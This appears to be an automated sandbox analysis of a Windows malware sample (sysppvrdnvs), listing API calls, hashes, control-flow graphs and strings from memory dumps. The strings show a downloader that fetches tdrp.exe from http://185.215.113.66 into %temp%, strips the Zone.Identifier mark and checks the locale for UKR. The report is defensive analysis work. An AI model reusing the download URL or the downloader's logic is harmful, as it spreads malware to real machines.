                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                              • String ID: 239.255.255.250$X#A
                                                                                                                                                                                              • API String ID: 726339449-2206458040
                                                                                                                                                                                              • Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                                                                              • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                                                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                              • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1603358586-0
                                                                                                                                                                                              • Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                                                                              • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4174406920-0
                                                                                                                                                                                              • Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                                                                              • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                                                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                                                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 107502007-0
                                                                                                                                                                                              • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                              • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                              • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                                                                                • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                              • String ID: www.update.microsoft.com
                                                                                                                                                                                              • API String ID: 4063137541-1705189816
                                                                                                                                                                                              • Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                                                                              • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                                                                              • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3943618503-0
                                                                                                                                                                                              • Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                                                                              • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                                                                              • Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                                                                              • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocalestrcmp
                                                                                                                                                                                              • String ID: UKR
                                                                                                                                                                                              • API String ID: 3191669094-64918367
                                                                                                                                                                                              • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                              • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                                                                              • srand.MSVCRT ref: 0040F570
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                                                                              • strlen.NTDLL ref: 0040F59A
                                                                                                                                                                                              • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F5B9
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F5CD
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                                                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F70F
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7B5
                                                                                                                                                                                              • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7CC
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7E0
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F807
                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F844
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$.#v
                                                                                                                                                                                              • API String ID: 1632876846-885412783
                                                                                                                                                                                              • Opcode ID: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
                                                                                                                                                                                              • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                                                                              • Opcode Fuzzy Hash: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                                                                              • srand.MSVCRT ref: 004064B0
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                                                                              • rand.MSVCRT ref: 004064D6
                                                                                                                                                                                              • rand.MSVCRT ref: 004064EA
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040650F
                                                                                                                                                                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                                                                              • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00406609
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • .#v, xrefs: 004065F2, 0040662D
                                                                                                                                                                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                                                                              • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                                                                              • %temp%, xrefs: 004064CB
                                                                                                                                                                                              • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                                                                              • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe$.#v
                                                                                                                                                                                              • API String ID: 2816847299-151917633
                                                                                                                                                                                              • Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                                                                              • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                                                                              • Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                                                                              • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 548 40b850-40b867 call 40b780 551 40b869 548->551 552 40b86e-40b88a call 40b3d0 strcmp 548->552 553 40baf5-40baf8 551->553 556 40b891-40b8ad call 40b3d0 strstr 552->556 557 40b88c 552->557 560 40b8f0-40b90c call 40b3d0 strstr 556->560 561 40b8af-40b8cb call 40b3d0 strstr 556->561 557->553 568 40b90e-40b92a call 40b3d0 strstr 560->568 569 40b94f-40b96b call 40b3d0 strstr 560->569 566 40b8eb 561->566 567 40b8cd-40b8e9 call 40b3d0 strstr 561->567 566->553 567->560 567->566 578 40b94a 568->578 579 40b92c-40b948 call 40b3d0 strstr 568->579 576 40b96d-40b989 call 40b3d0 strstr 569->576 577 40b9ae-40b9c4 EnterCriticalSection 569->577 590 40b9a9 576->590 591 40b98b-40b9a7 call 40b3d0 strstr 576->591 582 40b9cf-40b9d8 577->582 578->553 579->569 579->578 583 40ba09-40ba14 call 40bb00 582->583 584 40b9da-40b9ea 582->584 597 40baea-40baef LeaveCriticalSection 583->597 598 40ba1a-40ba28 583->598 587 40ba07 584->587 588 40b9ec-40ba05 call 40df20 584->588 587->582 588->583 590->553 591->577 591->590 597->553 600 40ba2a 598->600 601 40ba2e-40ba3f call 40a740 598->601 600->601 601->597 604 40ba45-40ba62 call 40df20 601->604 607 40ba64-40ba74 604->607 608 40baba-40bad2 604->608 609 40ba80-40bab8 call 40ab60 607->609 610 40ba76-40ba7e Sleep 607->610 611 40bad8-40bae3 call 40bb00 608->611 609->611 610->607 611->597 616 40bae5 call 40b530 611->616 616->597
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                                                                                • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                                                                              • strcmp.NTDLL ref: 0040B880
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                              • API String ID: 2906596889-2213908610
                                                                                                                                                                                              • Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                                                                              • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 618 401920-401947 GetTickCount WaitForSingleObject 619 401ac9-401acf 618->619 620 40194d-401964 WSAWaitForMultipleEvents 618->620 621 4019f0-401a03 GetTickCount 620->621 622 40196a-401981 WSAEnumNetworkEvents 620->622 623 401a43-401a4c GetTickCount 621->623 624 401a05-401a14 EnterCriticalSection 621->624 622->621 625 401983-401988 622->625 629 401ab5-401ac3 WaitForSingleObject 623->629 630 401a4e-401a5d EnterCriticalSection 623->630 626 401a16-401a1d 624->626 627 401a3a-401a41 LeaveCriticalSection 624->627 625->621 628 40198a-401990 625->628 631 401a35 call 401820 626->631 632 401a1f-401a27 626->632 627->629 628->621 633 401992-4019b1 accept 628->633 629->619 629->620 634 401aa1-401ab1 LeaveCriticalSection GetTickCount 630->634 635 401a5f-401a77 InterlockedExchangeAdd call 40df20 630->635 631->627 632->626 636 401a29-401a30 LeaveCriticalSection 632->636 633->621 638 4019b3-4019c2 call 4022c0 633->638 634->629 643 401a97-401a9f 635->643 644 401a79-401a82 635->644 636->629 638->621 645 4019c4-4019df call 401740 638->645 643->634 643->635 644->643 646 401a84-401a8d call 40b4f0 644->646 645->621 651 4019e1-4019e7 645->651 646->643 651->621 652 4019e9-4019eb call 401cf0 651->652 652->621
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004019F6
